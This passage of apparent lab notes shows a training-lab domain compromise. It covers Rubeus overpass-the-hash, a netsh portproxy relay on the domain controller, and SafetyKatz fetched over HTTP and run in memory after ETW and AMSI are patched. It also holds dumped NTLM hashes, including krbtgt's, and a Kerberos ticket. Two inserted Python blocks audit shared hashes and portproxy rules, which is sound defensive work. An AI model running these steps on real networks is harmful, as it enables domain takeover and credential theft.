NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356e (13678)


User : VPN178user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356f (13679)


User : VPN179user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003570 (13680)


User : VPN180user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 000003e8 (1000)


User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5

RID : 00000451 (1105)


User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565

RID : 00000452 (1106)


User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID : 00000453 (1107)


User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID : 00000454 (1108)


User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754

RID : 00000455 (1109)


User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID : 00000456 (1110)


User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID : 0000106a (4202)


User : DCORP-STDADMIN$
LM :
NTLM : 323e49189b1edbea4a323142017328cb

RID : 00003571 (13681)


User : DCORP-STD161$
LM :
NTLM : 9ef9daa7b4bc99ab3e4121f2abd037c7

RID : 00003572 (13682)


User : DCORP-STD162$
LM :
NTLM : 354a9b4320a227e36d82c19f92851f5b

RID : 00003573 (13683)


User : DCORP-STD163$
LM :
NTLM : 75e1e5ec9a9f15290d40cd1b04fede35

RID : 00003574 (13684)


User : DCORP-STD164$
LM :
NTLM : 9fa111e9828fcb2a53d01dcf8133cc0d

RID : 00003575 (13685)


User : DCORP-STD165$
LM :
NTLM : 565d99510bbbe8fb3e4fa5c9c2120bc5

RID : 00003576 (13686)


User : DCORP-STD166$
LM :
NTLM : 1ab7d20a96b7b4b34e0c806b7631ad8e

RID : 00003577 (13687)


User : DCORP-STD168$
LM :
NTLM : 313fc2c203e17c1a63554c88e090c205

RID : 00003578 (13688)


User : DCORP-STD167$
LM :
NTLM : 69a450cb407f22862f946f22d20db2c2

RID : 00003579 (13689)


User : DCORP-STD169$
LM :
NTLM : ceeab9f5c7798eb9034512934ec115a8

RID : 0000357a (13690)


User : DCORP-STD170$
LM :
NTLM : 1d24dfc4057c69f71576c0cc1e862a17

RID : 0000357b (13691)


User : DCORP-STD171$
LM :
NTLM : 84d9394ef97f221290f257059e8086d0

RID : 0000357c (13692)


User : DCORP-STD172$
LM :
NTLM : 49cc46d9ea5e322232497c21f808ff88
RID : 0000357d (13693)
User : DCORP-STD173$
LM :
NTLM : 323a672db50f9467fde4368c6a60c8d8

RID : 0000357e (13694)


User : DCORP-STD174$
LM :
NTLM : b642781c290b8550a2e9b2661cf87654

RID : 0000357f (13695)


User : DCORP-STD175$
LM :
NTLM : 57f3d186ece9047624b82015fab8d00e

RID : 00003580 (13696)


User : DCORP-STD176$
LM :
NTLM : 79207f3a25b685aa97ea1b34aef53fef

RID : 00003581 (13697)


User : DCORP-STD177$
LM :
NTLM : 2979ebc70dd459e65f8ac3e998aed6b1

RID : 00003582 (13698)


User : DCORP-STD178$
LM :
NTLM : 956164515f0459ea114452437d5ea4d7

RID : 00003583 (13699)


User : DCORP-STD180$
LM :
NTLM : 459c493625fe5994ff309debff15f163

RID : 00003584 (13700)


User : DCORP-STD179$
LM :
NTLM : c9b2183c974b57b61d873026a4443688

RID : 0000044f (1103)


User : mcorp$
LM :
NTLM : a8f73b279dc7257c7a8a2d0c911043d2

RID : 00000450 (1104)


User : US$
LM :
NTLM : af07f85604860fdb9abc78c922792e09

RID : 00000458 (1112)


User : ecorp$
LM :
NTLM : 6f3e00e84e8f3a79b38bfbbea011839b
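The dump above carries a finding a blue team would pull out immediately: every Control*user shares one NTLM hash, every Support*user a second and every VPN*user a third. Identical hashes mean identical passwords, so a single compromised account in a group exposes all of them. The Python below is an added example, not part of the lab notes or of mimikatz: it parses lsadump::lsa output in the layout shown above and reports accounts that share a hash or have no usable password hash at all. The sample dump is constructed in the same layout with placeholder hash values; only the empty-password NT hash constant is a real value.

```python
"""Audit a mimikatz lsadump::lsa dump for shared and empty NTLM hashes.

Added example: turns the RID/User/LM/NTLM blocks into records and groups
them by hash, the same check a blue team runs after a credential audit.
"""
import re
from collections import defaultdict

# NT hash of the empty password (well-known constant).
EMPTY_PASSWORD_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One block per account; LM and NTLM may be blank (e.g. Guest), so both are optional.
ENTRY_RE = re.compile(
    r"RID\s*:\s*(?P<rid_hex>[0-9a-fA-F]+)\s*\((?P<rid>\d+)\)\s*"
    r"User\s*:\s*(?P<user>\S+)\s*"
    r"LM\s*:\s*(?P<lm>[0-9a-fA-F]{32})?\s*"
    r"NTLM\s*:\s*(?P<ntlm>[0-9a-fA-F]{32})?"
)

# Constructed sample in the lsadump::lsa layout; hashes are placeholders, not real.
SAMPLE_DUMP = """\
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 11111111111111111111111111111111

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 0000045e (1118)
User : svcadmin
LM :
NTLM : 22222222222222222222222222222222

RID : 00003535 (13621)
User : Control161user
LM :
NTLM : 33333333333333333333333333333333

RID : 00003536 (13622)
User : Control162user
LM :
NTLM : 33333333333333333333333333333333

RID : 0000355d (13661)
User : VPN161user
LM :
NTLM : 44444444444444444444444444444444

RID : 0000355e (13662)
User : VPN162user
LM :
NTLM : 44444444444444444444444444444444

RID : 00001ffe (8190)
User : legacysvc
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

RID : 000003e8 (1000)
User : DCORP-DC$
LM :
NTLM : 55555555555555555555555555555555
"""


def parse_lsadump(text):
    """Return one dict per account: rid (int), user, ntlm (lower-case hex or '')."""
    return [{"rid": int(m.group("rid")), "user": m.group("user"),
             "ntlm": (m.group("ntlm") or "").lower()}
            for m in ENTRY_RE.finditer(text)]


def shared_hashes(entries):
    """Map each NTLM hash used by more than one account to the sorted account names."""
    by_hash = defaultdict(list)
    for e in entries:
        if e["ntlm"]:
            by_hash[e["ntlm"]].append(e["user"])
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def weak_accounts(entries):
    """Accounts with no NT hash at all or with the empty-password hash."""
    return sorted(e["user"] for e in entries
                  if not e["ntlm"] or e["ntlm"] == EMPTY_PASSWORD_NTLM)


if __name__ == "__main__":
    entries = parse_lsadump(SAMPLE_DUMP)
    for h, users in shared_hashes(entries).items():
        print(f"{len(users)} accounts share hash {h[:8]}...: {', '.join(users)}")
    print("empty/no password:", ", ".join(weak_accounts(entries)))
```

Computer account hashes are machine-generated and practically never collide, so every group the script reports is a human password-setting practice (a template password per role, here). The fix is a forced reset of the affected accounts plus a banned-password list or fine-grained password policy for the role groups, and a re-run of the audit afterwards to confirm the groups are gone.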

Using SafetyKatz
We will host SafetyKatz.exe on a web server on our student machine using HFS.
Now we execute an Overpass-the-Hash attack to get a command prompt with Domain Administrator
privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : ITEXXIF1
[*] Domain : EZK5XMJI
[*] Password : BK5IGGQ0
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3688
[+] LUID : 0xb9e0d8

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 12181720
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0xb9e0d8
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/28/2024 3:27:11 AM
EndTime : 6/28/2024 1:27:11 PM
RenewTill : 7/5/2024 3:27:11 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : KVDsvlnvX9Be66s19LT0xe85TyMpqLbFQl/6Tv+qYuk=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt opens with administrator privileges. We will copy Loader.exe to dcorp-dc.
C:\Windows\system32>xcopy /y C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\
C:\AD\Tools\Loader.exe
1 File(s) copied

Now we create a port proxy rule on dcorp-dc: any traffic arriving on port 8080 of dcorp-dc is forwarded
to port 80 on our student machine. Then we execute SafetyKatz.exe in memory.
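A portproxy rule is persistent: netsh stores it under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp and it survives reboots, so a rule like this one quietly turns the domain controller into a relay towards another host. The command itself shows up in process-creation auditing (event 4688 with "netsh interface portproxy add" in the command line) and the registry write in Sysmon event 13 on that key. The Python below is an added example, not part of the lab notes: it parses the listing printed by netsh interface portproxy show v4tov4 and flags rules whose target is outside the networks the host is expected to talk to, or that listen on all interfaces. The sample listing is constructed in the column layout netsh prints as I know it, so adjust the regex if your build formats the table differently; the expected networks are an assumption for the example.

```python
"""Audit netsh portproxy rules for unexpected forwarding targets.

Added example: parses `netsh interface portproxy show v4tov4` output and reports
rules that forward outside the expected networks or listen on every interface.
"""
import ipaddress
import re

# One data row: listen address, listen port, connect address, connect port.
RULE_RE = re.compile(r"^(?P<laddr>\S+)\s+(?P<lport>\d+)\s+(?P<caddr>\S+)\s+(?P<cport>\d+)\s*$", re.M)

# Constructed sample listing; the 8080 -> 172.16.100.163:80 rule is the one the lab creates,
# the loopback rule is a benign placeholder and the last row uses a hostname target.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8080        172.16.100.163  80
127.0.0.1       5986        172.16.2.1      5985
0.0.0.0         9090        relay.example   443
"""

ANY_ADDR = ipaddress.ip_address("0.0.0.0")


def _addr(text):
    """IP address object, or the raw string when netsh stored a hostname."""
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return text


def parse_portproxy(output):
    """Rules as dicts with listen/connect addresses and integer ports."""
    return [{"listen": _addr(m.group("laddr")), "listen_port": int(m.group("lport")),
             "connect": _addr(m.group("caddr")), "connect_port": int(m.group("cport"))}
            for m in RULE_RE.finditer(output)]


def audit_portproxy(rules, expected_networks):
    """Findings for rules that forward outside expected_networks or listen on 0.0.0.0.

    expected_networks: CIDR strings the host is expected to forward to (assumption
    for the example; on a domain controller the right baseline is no rules at all).
    """
    nets = [ipaddress.ip_network(n) for n in expected_networks]
    findings = []
    for r in rules:
        reasons = []
        target = r["connect"]
        if isinstance(target, str):
            reasons.append(f"target '{target}' is a hostname, not an address")
        elif not any(target in n for n in nets):
            reasons.append(f"target {target} is outside expected networks")
        if r["listen"] == ANY_ADDR:
            reasons.append("listens on all interfaces")
        if reasons:
            findings.append({"rule": f"{r['listen']}:{r['listen_port']} -> "
                                     f"{target}:{r['connect_port']}",
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_portproxy(parse_portproxy(SAMPLE_OUTPUT), ["172.16.2.0/24"]):
        print(f["rule"], "|", "; ".join(f["reasons"]))
```

On a domain controller the simplest policy is that the rule list must be empty, which makes the audit a one-line check; the network-based scoring is for jump hosts and similar systems where a small number of proxies are legitimate. Feeding the same parser the registry export (the value name is listenaddress/listenport, the data connectaddress/connectport) covers hosts where netsh itself is unavailable.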
C:\Windows\system32>winrs -r:dcorp-dc cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>cd C:\Users\Public
cd C:\Users\Public

C:\Users\Public>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1A5A-FDE2

Directory of C:\Users\Public

05/18/2024 03:39 AM <DIR> .


05/18/2024 01:32 AM <DIR> ..
11/10/2022 10:51 PM <DIR> Documents
05/08/2021 01:20 AM <DIR> Downloads
11/16/2022 05:28 AM 64,512 Loader.exe
05/08/2021 01:20 AM <DIR> Music
05/08/2021 01:20 AM <DIR> Pictures
04/20/2024 04:35 AM 331 Safety.bat
05/08/2021 01:20 AM <DIR> Videos
2 File(s) 64,843 bytes
7 Dir(s) 6,447,775,744 bytes free

C:\Users\Public>winrs -r:dcorp-dc "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.163"
winrs -r:dcorp-dc "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.163"

C:\Users\Public>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::lsa /patch" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::lsa /patch" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::lsa /patch exit

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # http://127.0.0.1:8080/SafetyKatz.exe
ERROR mimikatz_doLocal ; "http://127.0.0.1:8080/SafetyKatz.exe" command of "standard" module not
found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # -args
ERROR mimikatz_doLocal ; "-args" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch


Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)


User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID : 000001f5 (501)


User : Guest
LM :
NTLM :

RID : 000001f6 (502)


User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986
RID : 00000459 (1113)
User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID : 0000045a (1114)


User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID : 0000045b (1115)


User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID : 0000045d (1117)


User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7

RID : 0000045e (1118)


User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8

RID : 0000045f (1119)


User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID : 00000460 (1120)


User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID : 00000461 (1121)


User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d

RID : 00000462 (1122)


User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID : 00001055 (4181)


User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID : 00003521 (13601)


User : student161
LM :
NTLM : 12fe951ecdce0ee2edd5a4d71a0d6e0b

RID : 00003522 (13602)


User : student162
LM :
NTLM : 2230beda3bcd55b72cc4c1a5ef8170e9
RID : 00003523 (13603)
User : student163
LM :
NTLM : ccbca8c20310dbc0c5c9dcf1fde108b8

RID : 00003524 (13604)


User : student164
LM :
NTLM : 55e3baaf40c19d73f46b601d3cbfd41b

RID : 00003525 (13605)


User : student165
LM :
NTLM : a42ea87cc59018a3b49ec5d9be31a646

RID : 00003526 (13606)


User : student166
LM :
NTLM : 24b141d31352ea4f12745579e4885756

RID : 00003527 (13607)


User : student167
LM :
NTLM : 5ea118645828dcab565bf5895ca4ea57

RID : 00003528 (13608)


User : student168
LM :
NTLM : 53171b516f11d8b38e9fb0572014ba55

RID : 00003529 (13609)


User : student169
LM :
NTLM : 5a231022659299b4a1f2d1651d1c5106

RID : 0000352a (13610)


User : student170
LM :
NTLM : 9b0a73646f1fab4f0321f4526f3ed8f1

RID : 0000352b (13611)


User : student171
LM :
NTLM : 83c26fe5a55558897267fdf9a0d91d0d

RID : 0000352c (13612)


User : student172
LM :
NTLM : 1c0175bcef53648c75a88d566d2df3da

RID : 0000352d (13613)


User : student173
LM :
NTLM : de2a9206f558dddf3ded7b5f3427182c

RID : 0000352e (13614)


User : student174
LM :
NTLM : 6c22f89d3c33d5d260f195be679212b3

RID : 0000352f (13615)


User : student175
LM :
NTLM : 2c102014852ffa9959434ac02dc0fecd

RID : 00003530 (13616)


User : student176
LM :
NTLM : a8918ce94dcd39974537493be3a4895c

RID : 00003531 (13617)


User : student177
LM :
NTLM : d348e38df9c4883b5f234d83deb038f3

RID : 00003532 (13618)


User : student178
LM :
NTLM : cc4f8e304a59ed00c47a87d42b7c107f

RID : 00003533 (13619)


User : student179
LM :
NTLM : 667598cfb79b5ca955c70afba1606ee2

RID : 00003534 (13620)


User : student180
LM :
NTLM : 2e893c9e2619ca18f0560e732c573eb9

RID : 00003535 (13621)


User : Control161user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003536 (13622)


User : Control162user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003537 (13623)


User : Control163user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003538 (13624)


User : Control164user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003539 (13625)


User : Control165user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353a (13626)


User : Control166user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353b (13627)


User : Control167user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353c (13628)


User : Control168user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353d (13629)


User : Control169user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353e (13630)


User : Control170user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353f (13631)


User : Control171user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003540 (13632)


User : Control172user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003541 (13633)


User : Control173user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003542 (13634)


User : Control174user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003543 (13635)


User : Control175user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003544 (13636)


User : Control176user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003545 (13637)


User : Control177user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003546 (13638)


User : Control178user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003547 (13639)


User : Control179user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003548 (13640)


User : Control180user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003549 (13641)


User : Support161user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354a (13642)


User : Support162user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354b (13643)


User : Support163user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354c (13644)


User : Support164user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354d (13645)


User : Support165user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354e (13646)


User : Support166user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354f (13647)


User : Support167user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003550 (13648)


User : Support168user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003551 (13649)


User : Support169user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003552 (13650)
User : Support170user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003553 (13651)


User : Support171user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003554 (13652)


User : Support172user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003555 (13653)


User : Support173user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003556 (13654)


User : Support174user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003557 (13655)


User : Support175user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003558 (13656)


User : Support176user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003559 (13657)


User : Support177user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355a (13658)


User : Support178user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355b (13659)


User : Support179user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355c (13660)


User : Support180user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355d (13661)


User : VPN161user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000355e (13662)
User : VPN162user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355f (13663)


User : VPN163user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003560 (13664)


User : VPN164user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003561 (13665)


User : VPN165user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003562 (13666)


User : VPN166user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003563 (13667)


User : VPN167user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003564 (13668)


User : VPN168user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003565 (13669)


User : VPN169user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003566 (13670)


User : VPN170user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003567 (13671)


User : VPN171user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003568 (13672)


User : VPN172user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003569 (13673)


User : VPN173user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356a (13674)


User : VPN174user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356b (13675)


User : VPN175user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356c (13676)


User : VPN176user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356d (13677)


User : VPN177user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356e (13678)


User : VPN178user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356f (13679)


User : VPN179user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003570 (13680)


User : VPN180user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

